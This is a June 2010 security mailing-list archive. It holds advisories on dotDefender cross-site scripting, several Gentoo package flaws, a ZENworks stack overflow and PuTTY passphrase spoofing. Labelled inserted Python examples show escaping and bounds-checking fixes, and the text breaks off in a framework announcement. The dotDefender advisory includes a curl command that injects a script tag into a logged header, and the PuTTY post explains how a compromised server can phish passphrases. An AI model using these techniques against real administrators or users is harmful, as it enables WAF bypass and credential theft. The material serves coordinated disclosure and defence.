Applicure dotDefender 4.0 administrative interface cross site scripting

2010-06-01 Thread Sandro Gauci


Applicure dotDefender 4.0 administrative interface cross site scripting



An advisory by EnableSecurity.

ID: ES-20100601

Advisory URL:
http://resources.enablesecurity.com/advisories/ES-20100601-dotdefender4.txt

Affected Versions: version 4.0

Fixed versions: 4.01-3 (and later)

Description:

Applicure dotDefender is a Web Application Firewall that can be installed on
Windows and Linux servers.

From their website (applicure.com):
"dotDefender is the market-leading software Web Application Firewall (WAF).
dotDefender boasts enterprise-class security, advanced integration capabilities,
easy maintenance and low total cost of ownership (TCO). dotDefender is the
perfect choice for protecting your website and web applications today."

Credits:

These vulnerabilities were discovered during WAF testing by Sandro Gauci of
EnableSecurity. We contacted AppliCure on May 17, 2010 about this vulnerability.
They were already working on a fix.



Technical details:

The log viewer facility in dotDefender does not properly HTML-encode
user-supplied input. This leads to a cross-site scripting vulnerability when
the log viewer displays HTTP headers.



Demo:

One may use curl to insert headers containing HTML tags using the --header
switch.
Example:

curl "http:///c?a=" \
--header "<script>alert(1): aa"

When the administrator views the log viewer page, his/her web browser will
execute the attacker's JavaScript.

The following demo shows how an attacker can switch off dotDefender in order to
bypass any "protection" offered by the WAF:

http://vimeo.com/12132622
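
As an added example (not code from the advisory or from dotDefender), the
defect and its fix side by side: a constructed request in the shape of the
curl demo above is split into headers and rendered as a log-viewer entry
twice, once interpolated verbatim and once HTML-escaped. The host name and
header values are constructed.

```python
import html
import re

# Constructed sample request in the shape of the advisory's curl demo:
# one header whose *name* is an HTML tag. Host and values are made up.
SAMPLE_REQUEST = (
    "GET /c?a= HTTP/1.1\r\n"
    "Host: waf.example.test\r\n"
    "<script>alert(1)</script>: aa\r\n"
    "User-Agent: curl/7.19.7\r\n"
    "\r\n"
)


def parse_headers(raw_request):
    """Return the request's headers as (name, value) pairs.

    Splits each line on its first ':' only and keeps the text verbatim,
    which is what a WAF log viewer needs in order to show what was sent."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:      # [1:] skips the request line
        if line:
            name, _, value = line.partition(":")
            pairs.append((name.strip(), value.strip()))
    return pairs


def render_log_entry_vulnerable(headers):
    """Mirrors the defect: header text is interpolated into the page
    unchanged, so tags inside it become live markup for the admin."""
    cells = "".join(f"<tr><td>{n}</td><td>{v}</td></tr>" for n, v in headers)
    return f"<table>{cells}</table>"


def render_log_entry_fixed(headers):
    """Hardened form: every attacker-controlled string is HTML-escaped
    before insertion (quote=True also covers attribute contexts)."""
    cells = "".join(
        f"<tr><td>{html.escape(n, quote=True)}</td>"
        f"<td>{html.escape(v, quote=True)}</td></tr>"
        for n, v in headers
    )
    return f"<table>{cells}</table>"


_SCAFFOLD_RE = re.compile(r"</?(?:table|tr|td)>")
_ACTIVE_TAG_RE = re.compile(r"<\s*/?\s*[a-z]", re.IGNORECASE)


def has_injected_markup(rendered):
    """Check a rendered entry: after removing the tags the viewer itself
    emits, does any other tag remain? True means input leaked as markup."""
    return _ACTIVE_TAG_RE.search(_SCAFFOLD_RE.sub("", rendered)) is not None
```

The same check can be run over a real log page as a regression test for the fix: any tag left after stripping the viewer's own scaffolding means a header reached the page unescaped.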

Timeline:

May 17, 2010: Initial contact
Jun 01, 2010: Release of this advisory

Solution:

Upgrade to the latest version of dotDefender:
http://www.applicure.com/



Contact: "Sandro Gauci" 

About EnableSecurity:

EnableSecurity is dedicated to providing high quality Information Security
Consultancy, Research and Development. EnableSecurity develops security tools
such as VOIPPACK (for Immunity CANVAS) and SIPVicious. EnableSecurity is
focused on analysis of security challenges and providing solutions to such
threats. EnableSecurity works on developing custom targeted security solutions,
as well as working with existing off the shelf security tools to provide the
best results for their customers. More info at enablesecurity.com

Disclaimer: The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There are no
warranties with regard to this information. Neither the author nor the publisher
accepts any liability for any direct, indirect, or consequential loss or damage
arising from use of, or reliance on, this information.


Re: RE: Nginx 0.8.35 Space Character Remote Source Disclosure

2010-06-01 Thread info
The vulnerability in stable versions now doesn't work.
Original Advisory:
http://blog.pouya.info/userfiles/vul/NginX.rar


[ GLSA 201006-09 ] sudo: Privilege escalation

2010-06-01 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201006-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: sudo: Privilege escalation
  Date: June 01, 2010
  Bugs: #321697
ID: 201006-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A flaw in sudo's -e option may allow local attackers to execute
arbitrary commands.

Background
==========

sudo allows a system administrator to give users the ability to run
commands as other users.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  app-admin/sudo                 < 1.7.2_p6               >= 1.7.2_p6

Description
===========

The command matching functionality does not properly handle when a file
in the current working directory has the same name as a pseudo-command
in the sudoers file and the PATH contains an entry for ".".

Impact
======

A local attacker with the permission to run sudoedit could, under
certain circumstances, execute arbitrary commands as whichever user he
has permission to run sudoedit as, typically root.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All sudo users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-admin/sudo-1.7.2_p6"

References
==========

  [ 1 ] CVE-2010-1163
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1163

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201006-09.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2010 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5





[ GLSA 201006-08 ] nano: Multiple vulnerabilities

2010-06-01 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201006-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: nano: Multiple vulnerabilities
  Date: June 01, 2010
  Bugs: #315355
ID: 201006-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Race conditions when editing files could lead to symlink attacks or
changes of ownerships of important files.

Background
==========

nano is a GNU GPL'd Pico clone with more functionality.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  app-editors/nano               < 2.2.4                   >= 2.2.4

Description
===========

Multiple race condition vulnerabilities have been discovered in nano.
For further information please consult the CVE entries referenced
below.

Impact
======

Under certain conditions, a local, user-assisted attacker could
possibly overwrite arbitrary files via a symlink attack on an
attacker-owned file that is being edited by the victim, or change the
ownership of arbitrary files.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All nano users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-editors/nano-2.2.4"

References
==========

  [ 1 ] CVE-2010-1160
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1160
  [ 2 ] CVE-2010-1161
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1161

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201006-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2010 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5





ZDI-10-090: Novell ZENworks Configuration Management Preboot Service Remote Code Execution Vulnerability

2010-06-01 Thread ZDI Disclosures
ZDI-10-090: Novell ZENworks Configuration Management Preboot Service Remote 
Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-090
June 1, 2010

-- Affected Vendors:
Novell

-- Affected Products:
Novell Zenworks

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 9755. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Novell ZENworks. Authentication is not
required to exploit this vulnerability.

The specific flaw exists within the Preboot Service (novell-pbserv.exe).
This service listens for incoming connections on TCP port 998. The
service uses a simple binary protocol where the first DWORD is an opcode
followed by the specific opcode's data, typically in length/value pairs.
These length values are not checked against the destination buffer's size,
allowing stack-based overflows to occur. This can lead to arbitrary code
execution in the context of the SYSTEM user.
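
Added example, not Novell's or ZDI's code: a bounds-checking parser for the
message shape the advisory describes (a leading little-endian DWORD opcode,
then length/value pairs), which rejects any declared length that exceeds
either the bytes actually received or the fixed size of the field's
destination buffer. The opcode numbers, field names, buffer sizes and packet
limit are hypothetical, and the sample messages are constructed.

```python
import struct

# Hypothetical field table: opcode -> fields the service would copy into
# fixed-size destination buffers (name, buffer size in bytes). The advisory
# gives only the message shape, not the real opcodes or sizes.
OPCODE_FIELDS = {
    0x01: [("hostname", 64), ("mac", 17)],   # hypothetical
    0x02: [("image_path", 256)],             # hypothetical
}
MAX_PACKET = 4096   # hypothetical upper bound on one message


class ProtocolError(ValueError):
    """Raised when a message violates the declared layout or a bound."""


def parse_pbserv_message(data):
    """Parse <opcode:u32le> followed by repeated <len:u32le><value> pairs.

    Each declared length is checked twice before any bytes are copied:
    against the bytes remaining in the packet, and against the size of the
    destination buffer for that field. Omitting the second check is the
    defect class the advisory describes (a stack buffer overrun)."""
    if len(data) > MAX_PACKET:
        raise ProtocolError("packet too large")
    if len(data) < 4:
        raise ProtocolError("truncated opcode")
    (opcode,) = struct.unpack_from("<I", data, 0)
    if opcode not in OPCODE_FIELDS:
        raise ProtocolError(f"unknown opcode {opcode:#x}")
    offset = 4
    parsed = {}
    for name, buf_size in OPCODE_FIELDS[opcode]:
        if offset + 4 > len(data):
            raise ProtocolError(f"truncated length for {name}")
        (length,) = struct.unpack_from("<I", data, offset)
        offset += 4
        # Bound 1: the value must actually be present in the packet.
        if length > len(data) - offset:
            raise ProtocolError(f"{name}: declared {length} bytes, "
                                f"only {len(data) - offset} remain")
        # Bound 2: the value must fit its fixed-size destination buffer.
        if length > buf_size:
            raise ProtocolError(f"{name}: {length} bytes exceeds "
                                f"{buf_size}-byte buffer")
        parsed[name] = data[offset:offset + length]
        offset += length
    if offset != len(data):
        raise ProtocolError("trailing bytes after last field")
    return opcode, parsed


def build_message(opcode, values):
    """Encode a message in the same layout; used only to build samples."""
    out = struct.pack("<I", opcode)
    for value in values:
        out += struct.pack("<I", len(value)) + value
    return out


def is_well_formed(data):
    """True if the message parses within every bound, else False."""
    try:
        parse_pbserv_message(data)
        return True
    except ProtocolError:
        return False


# Constructed sample messages.
GOOD = build_message(0x01, [b"pxe-client-01", b"00:11:22:33:44:55"])
# Declared length present in the packet but far larger than the 64-byte
# hostname buffer: the case an unchecked copy would overflow on.
OVERSIZED = build_message(0x01, [b"A" * 300, b"00:11:22:33:44:55"])
# Declared length larger than the bytes actually sent.
TRUNCATED = struct.pack("<II", 0x02, 10_000) + b"x" * 8

if __name__ == "__main__":
    for label, msg in (("GOOD", GOOD), ("OVERSIZED", OVERSIZED),
                       ("TRUNCATED", TRUNCATED)):
        print(label, "accepted" if is_well_formed(msg) else "rejected")
```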

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More
details can be found at:

http://www.novell.com/support/search.do?cmd=displayKC&docType=kc&externalId=7005572&sliceId=1&docTypeID=DT_TID_1_1&dialogID=138523325&stateId=0%200%20138517923

-- Disclosure Timeline:
2010-02-09 - Vulnerability reported to vendor
2010-06-01 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Stephen Fewer of Harmony Security (www.harmonysecurity.com)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

[ GLSA 201006-07 ] SILC: Multiple vulnerabilities

2010-06-01 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201006-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: SILC: Multiple vulnerabilities
  Date: June 01, 2010
  Bugs: #284561
ID: 201006-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities were discovered in SILC Toolkit and SILC
Client, the worst of which allowing for execution of arbitrary code.

Background
==========

SILC (Secure Internet Live Conferencing protocol) Toolkit is a software
development kit for use in clients, and SILC Client is an IRSSI-based
text client.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  net-im/silc-toolkit            < 1.1.10                  >= 1.1.10
  2  net-im/silc-client             < 1.1.8                   >= 1.1.8
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Multiple vulnerabilities were discovered in SILC Toolkit and SILC
Client. For further information please consult the CVE entries
referenced below.

Impact
======

A remote attacker could overwrite stack locations and possibly execute
arbitrary code via a crafted OID value, Content-Length header or format
string specifiers in a nickname field or channel name.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All SILC Toolkit users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-im/silc-toolkit-1.1.10"

All SILC Client users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-im/silc-client-1.1.8"

References
==========

  [ 1 ] CVE-2008-7159
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7159
  [ 2 ] CVE-2008-7160
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7160
  [ 3 ] CVE-2009-3051
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3051
  [ 4 ] CVE-2009-3163
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3163

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201006-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2010 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5





[ GLSA 201006-06 ] Transmission: Multiple vulnerabilities

2010-06-01 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201006-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Transmission: Multiple vulnerabilities
  Date: June 01, 2010
  Bugs: #309831
ID: 201006-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Stack-based buffer overflows in Transmission may allow for remote
execution of arbitrary code.

Background
==========

Transmission is a cross-platform BitTorrent client.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  net-p2p/transmission           < 1.92                    >= 1.92

Description
===========

Multiple stack-based buffer overflows in the tr_magnetParse() function
in libtransmission/magnet.c have been discovered.

Impact
======

A remote attacker could cause a Denial of Service or possibly execute
arbitrary code via a crafted magnet URL with a large number of tr or ws
links.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Transmission users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-p2p/transmission-1.92"

References
==========

  [ 1 ] CVE-2010-1853
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1853

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201006-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2010 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5





[ GLSA 201006-05 ] Wireshark: Multiple vulnerabilities

2010-06-01 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201006-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Wireshark: Multiple vulnerabilities
  Date: June 01, 2010
  Bugs: #297388, #318935
ID: 201006-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities were found in Wireshark.

Background
==========

Wireshark is a versatile network protocol analyzer.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/wireshark         < 1.2.8-r1                >= 1.2.8-r1

Description
===========

Multiple vulnerabilities were found in the Daintree SNA file parser,
the SMB, SMB2, IPMI, and DOCSIS dissectors. For further information
please consult the CVE entries referenced below.

Impact
======

A remote attacker could cause a Denial of Service and possibly execute
arbitrary code via crafted packets or malformed packet trace files.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Wireshark users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.2.8-r1"

References
==========

  [ 1 ] CVE-2009-4376
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4376
  [ 2 ] CVE-2009-4377
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4377
  [ 3 ] CVE-2009-4378
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4378
  [ 4 ] CVE-2010-1455
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1455

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201006-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2010 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5





[ GLSA 201006-04 ] xine-lib: User-assisted execution of arbitrary code

2010-06-01 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201006-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: xine-lib: User-assisted execution of arbitrary code
  Date: June 01, 2010
  Bugs: #234777, #249041, #260069, #265250
ID: 201006-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in xine-lib might result in the remote
execution of arbitrary code.

Background
==========

xine-lib is the core library package for the xine media player, and
other players such as Amarok, Codeine/Dragon Player and Kaffeine.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  media-libs/xine-lib            < 1.1.16.3                >= 1.1.16.3

Description
===========

Multiple vulnerabilities have been reported in xine-lib. Please review
the CVE identifiers referenced below for details.

Impact
======

A remote attacker could entice a user to play a specially crafted video
file or stream with a player using xine-lib, potentially resulting in
the execution of arbitrary code with the privileges of the user running
the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All xine-lib users should upgrade to an unaffected version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/xine-lib-1.1.16.3"

NOTE: This is a legacy GLSA. Updates for all affected architectures are
available since April 10, 2009. It is likely that your system is
already no longer affected by this issue.

References
==========

  [ 1 ] CVE-2008-3231
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3231
  [ 2 ] CVE-2008-5233
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5233
  [ 3 ] CVE-2008-5234
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5234
  [ 4 ] CVE-2008-5235
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5235
  [ 5 ] CVE-2008-5236
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5236
  [ 6 ] CVE-2008-5237
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5237
  [ 7 ] CVE-2008-5238
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5238
  [ 8 ] CVE-2008-5239
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5239
  [ 9 ] CVE-2008-5240
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5240
  [ 10 ] CVE-2008-5241
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5241
  [ 11 ] CVE-2008-5242
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5242
  [ 12 ] CVE-2008-5243
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5243
  [ 13 ] CVE-2008-5244
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5244
  [ 14 ] CVE-2008-5245
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5245
  [ 15 ] CVE-2008-5246
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5246
  [ 16 ] CVE-2008-5247
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5247
  [ 17 ] CVE-2008-5248
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5248
  [ 18 ] CVE-2009-0698
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0698
  [ 19 ] CVE-2009-1274
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1274

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201006-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2010 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




Re: [Full-disclosure] PuTTY private key passphrase stealing attack

2010-06-01 Thread Borja Marcos

On Jun 1, 2010, at 2:47 AM, Jan Schejbal wrote:

> PuTTY, a SSH client for Windows, requests the passphrase to the ssh key in 
> the console window used for the connection. This could allow a malicious 
> server to gain access to a user's passphrase by spoofing that prompt.
> 
> We assume that the user is using key-bases ssh auth with ssh and connects 
> using PuTTY. PuTTY now asks for the passphrase to the key. The user enters 
> the passphrase. If the passphrase is wrong, PuTTY will now request the 
> passphrase again after stating that it was wrong. If the passphrase is 
> correct, the connection to the server is established.

This kind of attack is a real classic: the in-band problem inherent to any text
terminal. Reading the venerable and now forgotten classic by Wood and Kochan,
"Unix System Security", published in 1985, should still be mandatory.
Moreover, many of these in-band risks are applicable to window systems, which
exhibit even worse properties. See the fuss with "tab-nabbing" now.





Borja.



[ GLSA 201006-03 ] ImageMagick: User-assisted execution of arbitrary code

2010-06-01 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201006-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: ImageMagick: User-assisted execution of arbitrary code
  Date: June 01, 2010
  Bugs: #271502
ID: 201006-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An integer overflow in ImageMagick might allow remote attackers to
cause the remote execution of arbitrary code.

Background
==========

ImageMagick is a collection of tools and libraries for manipulating
various image formats.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  media-gfx/imagemagick          < 6.5.2.9                 >= 6.5.2.9

Description
===========

Tielei Wang has discovered that the XMakeImage() function in
magick/xwindow.c is prone to an integer overflow, possibly leading to a
buffer overflow.

Impact
======

A remote attacker could entice a user to open a specially crafted
image, possibly resulting in the remote execution of arbitrary code
with the privileges of the user running the application, or a Denial of
Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All ImageMagick users should upgrade to an unaffected version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-gfx/imagemagick-6.5.2.9"

NOTE: This is a legacy GLSA. Updates for all affected architectures are
available since June 4, 2009. It is likely that your system is already
no longer affected by this issue.

References
==========

  [ 1 ] CVE-2009-1882
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1882

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201006-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2010 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




PuTTY private key passphrase stealing attack

2010-06-01 Thread Jan Schejbal
PuTTY, a SSH client for Windows, requests the passphrase to the ssh key 
in the console window used for the connection. This could allow a 
malicious server to gain access to a user's passphrase by spoofing that 
prompt.


We assume that the user is using key-based ssh auth with ssh and 
connects using PuTTY. PuTTY now asks for the passphrase to the key. The 
user enters the passphrase. If the passphrase is wrong, PuTTY will now 
request the passphrase again after stating that it was wrong. If the 
passphrase is correct, the connection to the server is established.


A malicious/manipulated server could then display "Wrong passphrase" and 
ask for the passphrase again. If the user enters it again, it is sent to 
the malicious server.


As far as I can see, there are only two ways the user might detect it:

1. The real "Wrong passphrase" message is displayed without delay. After 
entering the correct passphrase, a small delay occurs.


2. The prompt contains the name of the key as stored on the client. 
Often the same name is used in the authorized_keys file on the server, 
giving it to the attacker. Maybe it is also possible for the server to 
remotely read the screen contents or duplicate it using some xterm 
control sequences, so users should not rely on it.


(See also the attached screenshot, where you can see that there is no 
visible difference.)


I assume that there are more similar issues like this one using 
different authentication modes etc.


This can be exploited using a modified .bashrc file. This means that 
once an attacker has gained access to a user account on the server, he 
can try this to gain the passphrase to the key.


Impact:
Low.
As a malicious server is required, the attack probability is not very 
high. Without the keyfile, the passphrase is worthless to the attacker 
unless it is used in multiple places. However, key-based auth is 
supposed to be secure even with untrusted/malicious servers.


Developer notification:
The possibility of such spoofing attacks is known:
http://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/gui-auth.html

Workaround:
Load the key into the Pageant agent before establishing the connection.

Other software affected:
Probably many console-based SSH tools have similar issues.

Onapsis Research Labs: Onapsis Bizploit - The opensource ERP Penetration Testing framework

2010-06-01 Thread Onapsis Research Labs

Dear colleague,

We are proud to announce the release of Onapsis Bizploit, the first opensource 
ERP Penetration Testing framework.

Presented at the renowned HITB Dubai security conference, Bizploit is expected 
to provide the security community with a basic framework to support the
discovery, exploration, vulnerability assessment and exploitation of ERP 
systems.

The term "ERP Security" has so far been understood by most of the IT Security 
and Auditing industries as a synonym for “Segregation of Duties”. While
this aspect is absolutely important for the overall security of the 
